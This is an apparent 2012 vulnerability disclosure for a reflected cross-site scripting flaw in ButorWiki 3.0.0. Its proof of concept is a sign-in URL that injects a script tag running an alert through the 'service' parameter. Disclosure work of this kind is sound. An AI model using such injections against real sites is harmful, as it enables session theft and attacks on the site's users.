ButorWiki version 3.0.0 suffers from a cross site scripting vulnerability.
bda14c1fa1703b593fc2b9c3aafb3b0d9488efc4242e2f03752e57b754c128f7
# Exploit Title: ButorWiki Cross Site Scripting
# Date: 16.02.2012
# Author: Sony
# Software Link: http://www.butor.com/
# Software Version: 3.0.0
# Web Browser : Mozilla Firefox
# Blog : http://st2tea.blogspot.com
# PoC:
http://st2tea.blogspot.com/2012/02/butorwiki-cross-site-scripting.html
..................................................................
http://www.butor.com/sso/signin?service=%22%22%3E%3Cscript%3Ealert%28%22123%20xss%22%29%3C/script%3E
http://2.bp.blogspot.com/-g6mSequ566o/Tz096bY5uhI/AAAAAAAAAfE/iNdaz2N0wTs/s1600/butorwiki.JPG